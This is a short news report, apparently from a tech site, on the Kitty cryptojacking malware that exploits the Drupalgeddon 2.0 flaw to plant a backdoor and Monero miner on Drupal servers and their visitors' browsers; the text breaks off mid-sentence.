File Photo
The latest version of the Kitty malware family is targeting Drupal websites in an effort to mine cryptocurrency.
According to researchers from Imperva's Incapsula, Kitty is the latest malware to attack the Drupal content management system (CMS) for the purpose of cryptojacking[1].
It has been just over a month since the Drupalgeddon 2.0 (CVE-2018-7600[2]) exploit was published. The vulnerability, deemed "highly critical," is a remote code execution bug present in Drupal versions 7.x and 8.x.
The vulnerability allows threat actors to employ various attack vectors to compromise Drupal websites. Scanning, backdoor implementation, and cryptocurrency mining are all possible, as well as a data theft and account hijacking.
Drupalgeddon 2.0 is caused by insufficient sanitation of arrays objects at Drupal's core modules, which allows for remote code execution. This vulnerability has become an entry point for other forms of malware to take root in Drupal setups, including the Kitty malware.
What makes Kitty different is that it is not only the internal network, server, and website itself which may be compromised to mine cryptocurrency, but the malware also targets visitors to compromised domains.
Kitty, a Monero cryptocurrency which utilizes open-source mining software for browsers, executes a bash script, kdrupal.php, which is written to an infected server disc. This then establishes a backdoor into an infected system separate from the Drupal vulnerability.
A scheduler then periodically re-downloads and executes the script every minute, which not only results in persistent infection but also allows attackers to push updates to the Kitty malware and infected servers quickly.
When the server is firmly under the attacker's control, the "kkworker" Monero cryptocurrency miner is then installed and executes. Any cryptocurrency mined through the stolen power